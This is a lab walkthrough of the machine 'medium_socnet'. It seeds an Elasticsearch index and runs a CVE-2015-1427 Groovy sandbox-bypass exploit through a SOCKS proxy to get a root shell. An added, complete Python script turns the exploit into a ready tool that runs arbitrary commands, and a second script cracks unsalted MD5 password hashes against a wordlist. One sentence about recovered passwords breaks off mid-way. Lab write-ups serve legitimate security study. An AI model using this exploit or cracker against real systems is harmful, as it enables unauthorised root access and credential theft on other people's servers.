Target machine: medium_socnet (7)

An error was returned, as shown below. Looking into the error turns up the ElasticSearch Groovy sandbox bypass and remote code execution vulnerability (CVE-2015-1427). The public exploit delivers its Groovy script through the script_fields of a _search request, and that script is only evaluated for documents the search actually returns, so the index must contain at least one record before the exploit can produce any output. Send the following request to add one.
Use curl to add a record to Elasticsearch:

    curl -XPOST 'http://172.17.0.2:9200/doc/test' -d '{ "name" : "lupin"}'

    ┌──(kali㉿kali)-[~/Workspace]
    └─$ proxychains curl -XPOST 'http://172.17.0.2:9200/doc/test' -d '{ "name" : "lupin"}'
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [proxychains] Strict chain...127.0.0.1:1080...172.17.0.2:9200...OK
    {"_index":"doc","_type":"test","_id":"AYP5xrq3R3Be1eJ72Xz3","_version":1,"created":true}

With a document in the index, rerun the exploit through the SOCKS proxy. This time the semi-interactive shell comes up and the command runs as root (uid=0):

    ┌──(kali㉿kali)-[~/Workspace]
    └─$ proxychains python2 a.py 172.17.0.2
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.16
    [ASCII-art banner]
    Exploit for ElasticSearch , CVE-2015-1427
    Version: 20150309.1
    {*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
    ~$ id
    [proxychains] Strict chain...127.0.0.1:1080...172.17.0.2:9200...OK
    uid=0(root) gid=0(root) groups=0(root)
    ~$
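The two steps above (seed the index, then fire the Groovy script) can be folded into one script that checks the document count first and only seeds when the index is empty. The following is an added example written for this page; it is not the a.py exploit used in the write-up. It assumes an Elasticsearch 1.3.x/1.4.x target with dynamic Groovy scripting enabled, reuses the target address and the doc/test index and type names from the curl command above, and builds the payload in the shape of the public CVE-2015-1427 proof of concept (java.lang.Math.class.forName as the reflection foothold into java.lang.Runtime). Like the page's own commands it has to be run under proxychains to reach the pivoted host.

```python
import json
import urllib.request
from typing import Dict, Optional

# Target and seed document taken from the curl command in the write-up.
ES_URL = "http://172.17.0.2:9200"
SEED_INDEX = "doc"
SEED_TYPE = "test"
SEED_DOC = {"name": "lupin"}


def needs_seed(count_response: Dict) -> bool:
    """True when the cluster reports zero documents.

    The Groovy script in a script_fields clause is evaluated once per search
    hit, so with an empty index the payload never runs and the exploit looks
    like it 'errored out'. That is the behaviour the write-up hit above."""
    return int(count_response.get("count", 0)) == 0


def build_script_query(cmd: str) -> Dict:
    """Build the _search body that runs `cmd` through the Groovy sandbox bypass.

    Payload shape follows the public CVE-2015-1427 proof of concept (assumption:
    the target still ships dynamic Groovy scripting, as ES 1.3/1.4 did)."""
    groovy = (
        'java.lang.Math.class.forName("java.lang.Runtime")'
        '.getRuntime().exec("%s").getText()' % cmd.replace('"', '\\"')
    )
    return {
        "size": 1,                      # one hit is enough; the script runs per hit
        "query": {"match_all": {}},     # match the seed document
        "script_fields": {"cmd": {"script": groovy, "lang": "groovy"}},
    }


def extract_cmd_output(search_response: Dict) -> Optional[str]:
    """Pull the script_fields result out of the first hit, or None if no hits."""
    hits = search_response.get("hits", {}).get("hits", [])
    if not hits:
        return None
    values = hits[0].get("fields", {}).get("cmd", [])
    return values[0] if values else None


def _http(method: str, path: str, body: Optional[Dict] = None) -> Dict:
    """Minimal JSON-over-HTTP helper; proxychains handles the SOCKS hop."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(
        ES_URL + path, data=data, method=method,
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read().decode())


def run(cmd: str) -> Optional[str]:
    """Seed the index if it is empty, then execute cmd and return its output."""
    if needs_seed(_http("GET", "/_count")):
        _http("POST", "/%s/%s" % (SEED_INDEX, SEED_TYPE), SEED_DOC)
        _http("POST", "/%s/_refresh" % SEED_INDEX)  # make the new doc searchable
    return extract_cmd_output(_http("POST", "/_search", build_script_query(cmd)))


if __name__ == "__main__":
    # Same check the write-up runs in the semi-interactive shell.
    print(run("id"))
```

Run it as `proxychains python3 es_rce.py` from the Kali box; the explicit `_refresh` matters because a freshly indexed document is not visible to `_search` until the next refresh, which is another way the first search can come back empty even after the seed.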

  • A passwords file was also found. Reading it yields a set of accounts with MD5-hashed passwords; the hashes were cracked (online MD5 lookup sites usually handle this) to recover the plaintext passwords, of which only
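The online lookup the write-up relies on is just a precomputed dictionary; the same check can be done offline against a wordlist. The following is an added example, not something from the original page, and the passwords file and wordlist it parses are constructed here (the page's actual file is not reproduced): two of the digests are the MD5 of common passwords, the third is an unmatchable placeholder so the miss case is visible.

```python
import hashlib
from typing import Dict, Iterable, Optional

# Constructed sample in a user:md5hex layout; not the file recovered on the box.
SAMPLE_PASSWORDS_FILE = """\
# user:md5(password)
alice:5f4dcc3b5aa765d61d8327deb882cf99
bob:25d55ad283aa400af464c76d713c07ad
carol:ffffffffffffffffffffffffffffffff
"""

# Constructed mini wordlist standing in for rockyou.txt or an online lookup table.
SAMPLE_WORDLIST = ["letmein", "password", "12345678", "qwerty"]


def parse_passwords_file(text: str) -> Dict[str, str]:
    """Map user -> lowercase hex MD5 digest, skipping blank and comment lines."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.partition(":")
        creds[user.strip()] = digest.strip().lower()
    return creds


def crack_md5(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Hash each candidate once and match it against every target digest.

    Unsalted MD5 means one digest per candidate covers all users at once, which
    is why a plain lookup table breaks these in seconds."""
    by_digest: Dict[str, list] = {}
    for user, digest in hashes.items():
        by_digest.setdefault(digest, []).append(user)
    found: Dict[str, Optional[str]] = {user: None for user in hashes}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in by_digest.get(digest, []):
            found[user] = word
    return found


if __name__ == "__main__":
    for user, pw in crack_md5(parse_passwords_file(SAMPLE_PASSWORDS_FILE),
                              SAMPLE_WORDLIST).items():
        print(user, pw if pw is not None else "<not in wordlist>")
```

Users whose hash is absent from the wordlist come back as None rather than being silently dropped, which keeps the account list intact for the next step of the box.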
